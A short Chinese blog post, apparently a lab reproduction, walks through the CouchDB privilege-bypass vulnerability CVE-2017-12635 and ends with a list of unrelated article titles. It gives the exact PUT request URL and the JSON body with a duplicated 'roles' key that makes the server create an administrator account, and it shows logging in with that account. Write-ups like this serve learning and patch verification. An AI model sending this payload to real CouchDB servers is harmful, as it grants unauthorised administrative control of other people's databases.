当前位置: 首页 > news >正文

Couchdb 权限绕过漏洞复现(CVE-2017-12635)

news 2025/9/16 14:57:37

Couchdb 权限绕过漏洞复现(CVE-2017-12635)

image

开启环境给了三个端口号,不知道哪个是正常的,最后试出来52226端口正常。

登录URL:http://192.168.91.129:52226/_utils/#

来到了登录页面

image

用postman发送PUT方法的请求包,这个请求包会导致数据库创建一个用户,在这会把xrzx这个用户创建出来并且加入到admin管理员组里面去

image

然后再回到登录页面,输入刚才创建的账号和密码登录即可

image

http://192.168.91.129:52226/_users/org.couchdb.user:xrzx

{

“type”: “user”,

“name”: “xrzx”,

“roles”: [“_admin”],

“roles”: [],

“password”: “admin”

}

http://www.lryc.cn/news/246664.html

相关文章:

  • GZ031 应用软件系统开发赛题第2套
  • lack——主页前后端开发优化(精华:java多线程实现数据插入)
  • Anaconda深度学习环境配置命令参考
  • 【iOS】知乎日报
  • python实现自动刷平台学时
  • Vue3-pnpm包管理器创建项目
  • Centos上安装Docker和DockerCompose
  • 视频文件+EasyDarwin做摄像机模拟器模拟RTSP流很方便,还能做成系统服务,方法与流程
  • 修改Linux系统的网络参数
  • virtualList 封装使用 虚拟列表 列表优化
  • HCIP-九、路由控制
  • Vue3水印(Watermark)
  • redis的性能管理、主从复制和哨兵模式
  • 排序算法:归并排序、快速排序、堆排序
  • Redis 面试题——持久化
  • Linux使用固定ip地址
  • ESP Multi-Room Music 方案:支持音频实时同步播放 实现音乐互联共享
  • java分布式锁分布式锁
  • 2. 流程控制|方法|数组|二维数组|递归
  • 22. 自动装配有哪些限制(需要注意)?
  • 14 网关实战:网关聚合API文档
  • css 固定按钮到页面顶部或者底部的实现方式
  • 【Java Spring】SpringBoot常用插件
  • GPT还远远不是真正的智能
  • 计算机网络:网络层
  • 消息队列进阶-1.消息队列的应用场景与选型
  • 浅谈堆和栈内存以及编程语言
  • SpringBootWeb案例_01
  • C语言数据结构-----栈和队列练习题(分析+代码)
  • uniapp基础-教程之HBuilderX配置篇-01